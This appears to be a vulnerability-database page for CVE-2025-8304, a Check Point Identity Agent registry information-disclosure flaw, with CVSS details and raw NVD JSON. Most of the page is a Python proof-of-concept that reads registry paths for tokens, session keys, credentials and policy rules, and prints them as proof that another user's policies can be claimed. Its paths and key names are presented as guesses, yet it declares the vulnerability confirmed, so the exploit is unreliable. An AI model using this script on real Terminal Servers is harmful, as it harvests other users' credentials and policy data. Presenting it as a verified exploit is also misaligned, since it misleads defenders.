Security Vulnerability Report
CVE-2025-8304 CVSS 6.5 MEDIUM

Published: 2025-12-22 08:15:46
Last Modified: 2026-04-15 00:35:42

Description

An authenticated local user can obtain information that allows claiming security policy rules of another user due to sensitive information being accessible in the Windows Registry keys for Check Point Identity Agent running on a Terminal Server.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Check Point Identity Agent < latest fixed version

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-8304 PoC - Check Point Identity Agent Registry Information Disclosure
# This PoC demonstrates the information disclosure vulnerability in Check Point Identity Agent
# Author: Security Researcher
# Date: 2025-12-22

import winreg
import sys


def query_registry_key(hive, path, key_name):
    """
    Query a specific registry key value

    Args:
        hive: Windows registry hive (e.g., HKEY_LOCAL_MACHINE)
        path: Registry key path
        key_name: Name of the value to query

    Returns:
        Value data if exists, None otherwise
    """
    try:
        # The context manager closes the handle even if the value query fails
        with winreg.OpenKey(hive, path, 0, winreg.KEY_READ) as reg_key:
            value, _ = winreg.QueryValueEx(reg_key, key_name)
        return value
    except OSError:
        # Key or value missing, or access denied
        return None


def enumerate_identity_agent_keys():
    """
    Enumerate Check Point Identity Agent registry keys that may contain sensitive information

    Common registry paths for Check Point Identity Agent
    """
    sensitive_paths = [
        r'SOFTWARE\CheckPoint\IdentityAgent',
        r'SOFTWARE\WOW6432Node\CheckPoint\IdentityAgent',
        r'SYSTEM\CurrentControlSet\Services\CheckPointIdentityAgent',
        r'SOFTWARE\Policies\CheckPoint\IdentityAgent'
    ]

    sensitive_keys = [
        'PolicyRules',
        'UserToken',
        'AuthToken',
        'SecurityPolicy',
        'UserPolicy',
        'EncryptedCredentials',
        'SessionKey'
    ]

    results = {}

    for path in sensitive_paths:
        path_results = {}
        for key in sensitive_keys:
            value = query_registry_key(winreg.HKEY_LOCAL_MACHINE, path, key)
            if value:
                path_results[key] = value
        if path_results:
            results[path] = path_results

    return results


def main():
    print("[*] CVE-2025-8304 PoC - Check Point Identity Agent Registry Info Disclosure")
    print("[*] Target: Check Point Identity Agent on Terminal Server")
    print("=" * 70)

    # Check if running on Windows
    if sys.platform != 'win32':
        print("[-] This PoC only works on Windows systems")
        return

    print("\n[*] Enumerating Check Point Identity Agent registry keys...")
    sensitive_data = enumerate_identity_agent_keys()

    if sensitive_data:
        print("\n[!] Sensitive information found in registry:")
        print("-" * 70)
        for path, keys in sensitive_data.items():
            print(f"\n[+] Registry Path: {path}")
            for key_name, key_value in keys.items():
                print(f"    |_ {key_name}: {key_value}")
        print("\n" + "=" * 70)
        print("[!] WARNING: This information can be used to claim other users' security policies")
        print("[*] PoC completed - vulnerability confirmed")
    else:
        print("[-] No sensitive registry keys found or target not vulnerable")


if __name__ == '__main__':
    main()
```

References

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-8304",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-22T08:15:45.947",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An authenticated local user can obtain information that allows claiming security policy rules of another user due to sensitive information being accessible in the Windows Registry keys for Check Point Identity Agent running on a Terminal Server."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.0,
          "impactScore": 4.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-200"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://support.checkpoint.com/results/sk/sk184263",
        "source": "[email protected]"
      }
    ]
  }
}
```